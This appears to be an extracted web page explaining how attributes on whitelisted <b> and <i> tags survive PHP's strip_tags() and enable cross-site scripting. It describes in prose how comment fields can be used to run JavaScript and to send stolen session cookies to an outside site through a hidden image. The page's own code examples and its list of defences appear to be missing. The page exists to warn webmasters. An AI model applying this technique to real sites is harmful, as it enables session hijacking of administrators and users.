First - This is NOT PHP specific problem! PHP language is used as first one which seemed to be convenient to show the problem.
Objective: Many web pages of newspapers, blogs, product reviews,... allow users to add comments. It is known vulnerability to include malicious content when possible. There are many ways to avoid malicious usage including:
First one is most secure but removes any ability to add bold or italic styling in comments. So, webmasters go for solutions 2 or 3.
Here is a web page demonstrating technology, how those "innocent" elements in whitelist can be used to attack user.
Usually portals strip tags with this function making sure users can pass only <b> and <i> tags. In PHP this is done with strip_tags() function or with preg_replace & friends;
These examples are using PHP-s strip_tags() but same may work with any language and any function. So, better test your systems before other do.
result=strip_tags(arg1,arg2) cleans up contents in arg1 from anything with < and > except whitelist in arg2. It is not important if some other function is used instead of strip_tags(). Often they have same problem. Of course there are always ones which are not vulnerable.
In this example we launch JavaScript when user slides mouse pointer over text "test". This is not maximum what can be done. In practice attacker can use style attribute to make this element screen-wide transparent canvas, so user anyway will launch it.
We get session cookies and show them to user. Innocent test but used later in different way
In this example we steal session cookies (of logged in administrator or other users) and sending them to friendly website. This can be accomplished without any weird behavious whatsovever. Image can be made by size 0x0 pixels or any other usual tricks are possible